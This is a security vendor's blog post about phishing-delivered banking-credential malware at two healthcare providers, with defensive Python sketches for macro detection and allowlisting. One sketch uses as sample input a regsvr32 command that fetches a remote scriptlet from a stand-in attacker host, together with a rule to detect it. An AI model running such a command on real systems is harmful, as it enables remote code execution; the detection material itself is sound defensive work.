
Tales From the SOC: Healthcare Edition

Over the past ten years, I have led and supported incident response engagements across nearly every industry vertical and trained security teams of all sizes to develop and improve their detection and response capabilities. One of the first areas addressed in these trainings is understanding whether an attack is targeted or opportunistic. Security teams beginning this kind of introspection typically arrive with preconceived notions of their attack landscape, which may contain a mixture of targeted and opportunistic threats. They may be biased toward a targeted threat because they consider it more dangerous, but identifying the nature of an attack early on helps determine the degree of the threat and the resources you will initially allocate in response.

A recent series of events with two customers at opposite ends of the size spectrum, but sharing a common vertical, brought this topic to the forefront. In this Tale From the SOC: Healthcare Edition, I will share how these organizations used a trail of digital evidence to identify the type of attack they were experiencing and to develop a remediation strategy. I will also share lessons learned that can be applied to organizations of every size and industry.

Established industry, modern threats

The healthcare sector has typically been one of the last industries to adopt new cybersecurity technologies, and it has consequently seen the risks from malware and cyber attacks rise considerably over the past few years. On one level, this is understandable. Healthcare is an established industry that moves much more slowly than the threat landscape. These organizations often opt to invest in IT infrastructure that reduces costs and improves patient care, rather than in cybersecurity that supports risk management initiatives but generally lacks immediate ROI.

Despite the weekly headlines proclaiming healthcare’s latest victim of a cyber attack and a spotlight focused on potential impacts to patient safety, too few healthcare organizations are taking proactive measures to meaningfully reduce their vulnerability. But, why? 

Organizations may perceive a threat differently depending on whether it targets the business itself or its consumers. Healthcare organizations generally favor solutions that have the least impact on their consumers, which usually translates into a high-risk security profile and an undersized security and IT capability.

Healthcare’s rigid and outdated computing environments aren't keeping pace. The organizations making headlines were targeted and compromised because they could be: the right investments in people and technology were not made, because shareholder value has to rise predictably or corners have to be cut. I believe it’s imperative that we reset that narrative. It's never too late, you can learn from these cautionary tales, and this is a call to action. If no efforts are made to correct the course, that worst-case loss-of-life scenario gets closer and closer to being a certainty.

A different twist: malware focused on employees, not patients

Research from our network telemetry showed that malware targeting end-of-life healthcare organizations, such as hospice and nursing home providers, was on the rise. You might expect this kind of threat to be after patient data, but all evidence indicated that the attackers were targeting employees of these healthcare systems. The malware being deployed waited for people to log into personal banking accounts, then stole their credentials. Executives at both of these organizations were initially skeptical of the results, as history would indicate that their patients, not employees, would be the more attractive target. We worked with our customers, communicating a summary of technical and operational details about the threat targeting them.

We saw a common phishing lure and social engineering approach that tied these attacks to hundreds of others - all of them focused on organizations in the healthcare vertical. While not all of these targets were our customers, open source intelligence enabled us to see that many healthcare organizations had been phished with the same lure. That perspective helped our customers in their decision-making process, indicating that this attack may not have been targeted but could belong to a mature threat group. 

For security teams, facts are expensive and some types are very rare. Anything you can establish as fact in the earliest stages of an attack is valuable. In this case, we understood the scale of the campaign and were confident it wasn't targeted - and that bought time for more detailed analysis of the threat and a much better understanding of how prepared these two different customers would be if it hadn't been intercepted so early.

One of the details we were interested in - a common investigative question - was when the initial compromise occurred. Having this knowledge is important, and it may be lost if you don't have the luxury of early detection - most notably the facts you lose when a system is immediately rebuilt and restored to functionality. A "scorched earth" strategy can be effective, but it isn't one that guarantees many answers.

Being confident that this threat wasn't targeted didn't mean it couldn't be painful - consider if the payload had deployed ransomware or a destructive malware sample instead of trying to steal employee banking credentials. Early detection created opportunities for us, one of which enabled us to contain this infection. Even an opportunistic attacker may decide a firefight for the environment is worthwhile if you give them the option.

Flat networks and phished emails

Let’s go back to our healthcare customers. One was a multi-state healthcare provider with tens of thousands of endpoints that had invested in a segmented network; the smaller, regional healthcare provider had a flat network of a few thousand endpoints. Now, you may think that having a flat network is unusual, but we see them all the time in our deployments. We have seen flat topologies on networks with hundreds of thousands of nodes, in some of the largest global multinational companies. I even recall one customer who had added every domain user to the local administrators group on every endpoint - effectively making every single user the equivalent of a domain admin.

I point this out because perfect security is impossible, and a wide range of factors determines what environmental configurations are possible. Even the most secure computing environments have weak points, and you can bet an adversary will figure them out quickly and use them to move around the network with ease once they find a single compromised account.

With both of these healthcare providers, we discovered that the source of the intrusion was a phishing email with an attached Office document containing a malicious macro. This is a typical entry point, and we often advise clients that the only way to mitigate these phishing attempts is through a layered approach: disabling macros in internet-sourced documents, using PDF and other document sandboxes, using a click-through web proxy, restricting admin privileges, and adopting a trusted DNS policy, among others.
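As a minimal illustration of one of these layers, the sketch below flags macro-enabled Office attachments before they reach a user. It relies on the fact that modern OOXML documents (.docm, .xlsm, etc.) are zip archives whose VBA code lives in a vbaProject.bin part; the function name and mail-gateway context are hypothetical, and a real control would also handle legacy OLE2 formats and Mark-of-the-Web.

```python
import io
import zipfile

# Macro-enabled OOXML files carry their VBA code in a vbaProject.bin part.
MACRO_PARTS = ("word/vbaProject.bin", "xl/vbaProject.bin", "ppt/vbaProject.bin")

def contains_vba_macros(data: bytes) -> bool:
    """Return True if an OOXML attachment embeds a VBA macro project."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as archive:
            names = set(archive.namelist())
    except zipfile.BadZipFile:
        # Not an OOXML zip (could be a legacy .doc/.xls OLE2 file) --
        # those need a separate check, not covered by this sketch.
        return False
    return any(part in names for part in MACRO_PARTS)

# Build a stand-in macro-enabled document in memory for demonstration.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as z:
    z.writestr("word/document.xml", "<w:document/>")
    z.writestr("word/vbaProject.bin", b"\x00fake-vba-project")

print(contains_vba_macros(buf.getvalue()))  # True
```

A gateway rule like this is cheap to run and complements, rather than replaces, endpoint-side macro policies.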

For healthcare organizations and others providing critical life-saving services, the decision to apply controls to Office documents must be carefully considered, because those controls can inadvertently block legitimate applications in ways that impact patient care. Healthcare professionals are understandably focused on having unfettered access to systems 24x7, and blocking a single Excel macro could pose a serious issue.

Why fighting false positives is important

Healthcare organizations also face difficult decisions around security and IT expenses, which might mean undersized or under-equipped teams. This is one of the most common scenarios I've encountered, and those smaller teams can be quickly overwhelmed by alerts or events from security products. Alert fatigue is a real phenomenon; one that small teams may be disproportionately ill-equipped to overcome.

One of the most common product features that helps with noise management is whitelisting, with varying degrees of detail. For teams with more work than time, whitelisting can be unintentionally abused and may prevent you from detecting something malicious. The phenomenon of adversaries abusing native operating system features has been on the rise for many years, and it complicates point solutions like whitelisting. Utilities that ship with the operating system, signed and verified, can be dangerous to whitelist because they are frequently abused, while blacklisting them could impact legitimate business operations. These capabilities should be used sparingly, taking into account the likelihood of creating a blind spot.
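To make the blind spot concrete, here is a toy sketch, not any vendor's actual logic: a naive allowlist keyed only on the executable path passes a signed OS utility unconditionally, even when the command line shows classic "living off the land" abuse (regsvr32 fetching a remote scriptlet). The paths, rule, and function names are illustrative assumptions.

```python
# Naive allowlist keyed only on executable path: signed OS utilities
# pass unconditionally, no matter what their command lines look like.
ALLOWLIST = {r"C:\Windows\System32\regsvr32.exe",
             r"C:\Windows\System32\rundll32.exe"}

def naive_verdict(path: str, cmdline: str) -> str:
    return "allow" if path in ALLOWLIST else "review"

def behavior_aware_verdict(path: str, cmdline: str) -> str:
    # Hypothetical behavioral rule: regsvr32 pulling a remote scriptlet
    # should be alerted on even though the binary itself is trusted.
    if path in ALLOWLIST:
        lowered = cmdline.lower()
        if "regsvr32" in path.lower() and "http" in lowered and "scrobj" in lowered:
            return "alert"
        return "allow"
    return "review"

lolbin_abuse = (r"C:\Windows\System32\regsvr32.exe",
                "/s /n /u /i:http://evil.example/payload.sct scrobj.dll")
print(naive_verdict(*lolbin_abuse))           # allow -> the blind spot
print(behavior_aware_verdict(*lolbin_abuse))  # alert
```

The point is not this one rule; it is that path- or signature-only allowlists must be paired with behavioral context, or every trusted utility becomes an invisible corridor.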

Let me address this issue directly. Any kind of classification schema is fallible. One challenge is that the training data behind a schema has to have the right mix of content to correctly separate the actions that are allowed from those that aren’t. You don’t want to look only at raw numbers or metadata; include a mixture of behaviors and outcomes to drive your schemas. Without this contextual variety, your results will contain blind spots, and you won’t be able to judge whether something is benign or malicious.

This gets to the heart of the efficacy of your protections. Many times, we see adversaries use something benign, like a Windows script, in ways that produce unexpected outcomes and fool your defensive systems. You have to account for the different outcome states - false positives, false negatives, and true positives. Together, these counts quantify how good a product is at finding bad things across your infrastructure, and being precise about this language becomes very important.
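The relationship between those counts can be made concrete with the standard precision and recall calculations; the numbers below are made up for illustration, not drawn from any product report.

```python
def precision_recall(tp: int, fp: int, fn: int) -> tuple[float, float]:
    """Summarize detection efficacy from alert outcomes.

    precision: of everything flagged, how much was actually bad?
    recall:    of everything bad, how much was flagged?
    """
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    return precision, recall

# Illustrative numbers: 90 true detections, 60 false alarms,
# and 10 threats missed outright.
p, r = precision_recall(tp=90, fp=60, fn=10)
print(f"precision={p:.2f} recall={r:.2f}")  # precision=0.60 recall=0.90
```

A product with precision like this looks busy but burns analyst hours on the 40% of alerts that are noise, which is exactly how small teams drown.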

Some endpoint protection products generate high levels of false positives. This can be a distraction, tying up analysts as they chase false leads that consume a lot of time and energy.

Lessons learned

Here are a few that stand out:

● First, network segmentation is one of the most effective ways to limit the scope and impact of an attack. If you are unable to segment your enterprise for some reason, you should consider other security controls that specifically address privilege escalation, credential access and lateral movement techniques. If you can't do those things, consider turning on the firewall - one of the most common features we see disabled and one of the most effective when properly configured.

● Test your backups to make sure that you are actually capturing the most current data, and then stage periodic recovery drills so you can hone your response workflows and establish the right orchestration steps to bring your systems back online in the appropriate order. If you don't regularly practice critical enterprise processes like disaster recovery and incident response, you're not ready for the real thing. Ultimately, when go-time arrives, you will make mistakes - and some mistakes are more costly than others.

● Secure your employees with better authentication methods. Start with a least privilege approach and add layers of security for your most critical accounts. For systems administrators, Privileged Access Workstations (PAWs) are one recommendation, while requiring multifactor authentication for all accounts with remote access might be another. Consider additional layers for accounts that have direct or indirect access to regulated data, such as personal information.

● Know the location of business-critical data and applications. Security teams should be easily able to determine whether a system supports one or both. Additionally, document the systems and users with access to sensitive information. Audit endpoints for spillage and consider policies that define safe handling procedures.

Devon is a principal researcher at Endgame, focusing on detection and response technologies. Formerly a Mandiant incident response and remediation lead, Devon has over 6 years of experience in security professional services, where he has worked with clients in nearly every conceivable industry. He has significant experience helping Fortune 500 organizations with the detection, response, and containment of advanced targeted threat actors and has led large-scale network and application architecture reviews, post-incident strategic planning, and regulatory gap assessments. He has delivered a range of technical presentations for security conferences, industry organizations, and the United States Department of Defense. Prior to his career in information security, Devon spent 15 years in operations roles as a system administrator and network engineer.